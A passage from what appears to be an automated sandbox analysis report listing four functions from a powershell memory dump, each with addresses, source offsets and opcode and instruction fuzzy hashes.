                                                                                              • Instruction ID: 25f5a8ebf9f4187363513edf89e035922eb5767c1dcab75a715796e11b3075dc
                                                                                              • Opcode Fuzzy Hash: 13ea3b70d995d6ef8db4431ac09d94a7c0f1e6564c25ee9719a70959d58cbb6e
                                                                                              • Instruction Fuzzy Hash: 55418467E0DAD66AF751532909FA0E9FFE0EF1326870901F3CA54CA093ED0D6D136941
                                                                                              Function 00007FFD348C9EE2 Relevance: .1, Instructions: 145COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c70286441274854b9843dda547cd78f71d44da83d664efd1f603fb3ab5fe3b6b
                                                                                              • Instruction ID: 31ee2d08a3d8ddff2bd8e5aeae45d61c1cd5eb3e42bcaa4e654d8e401b0d179b
                                                                                              • Opcode Fuzzy Hash: c70286441274854b9843dda547cd78f71d44da83d664efd1f603fb3ab5fe3b6b
                                                                                              • Instruction Fuzzy Hash: 0941D657A1DAC25EF712472C98E60DAEBE0FF13664B0911F3CE95C6093ED0D1C07AA92
                                                                                              Function 00007FFD348C730B Relevance: .1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4f8b908d79225d74543417043f5fa321cdde1e4e7f0fbe1da1748879428b70c
                                                                                              • Instruction ID: 386ff81da83563b30708e8bb1a8b51c85fb10e1561ad09519b97a86e69a9ff36
                                                                                              • Opcode Fuzzy Hash: a4f8b908d79225d74543417043f5fa321cdde1e4e7f0fbe1da1748879428b70c
                                                                                              • Instruction Fuzzy Hash: E13195A7B0C6935BF211927CA9F70DA7BE0DF5337874902B3CA84C64A3AD1D78476191
                                                                                              Function 00007FFD348C65FA Relevance: .1, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 162f9931f015e1445345bb4c556c76daa631c57ce12b7ebfc64c9717d44cc200
                                                                                              • Instruction ID: de7d17e09ba68f6caa4bba17cc1d755de15b79380396675b5cd1a74053751ab2
                                                                                              • Opcode Fuzzy Hash: 162f9931f015e1445345bb4c556c76daa631c57ce12b7ebfc64c9717d44cc200
                                                                                              • Instruction Fuzzy Hash: 5731C387A0D7961AF6620B2C19FA4D9AFD4DF533B0B0A11B3C784DD4B3AD1C6C07A252
                                                                                              Function 00007FFD348C7402 Relevance: .1, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e9e492708bc8486ad3b9831420439b89b475153508778cac600ad6b042993568
                                                                                              • Instruction ID: 8795ccab5fd5bdedcacbe220692a816fe9313e7024784e327917eb57febc35ee
                                                                                              • Opcode Fuzzy Hash: e9e492708bc8486ad3b9831420439b89b475153508778cac600ad6b042993568
                                                                                              • Instruction Fuzzy Hash: DE217397A0D6D25BF252937C6DF60EA7FE4DE5327430911B3C6C4C60A3AD0D2C47A1A6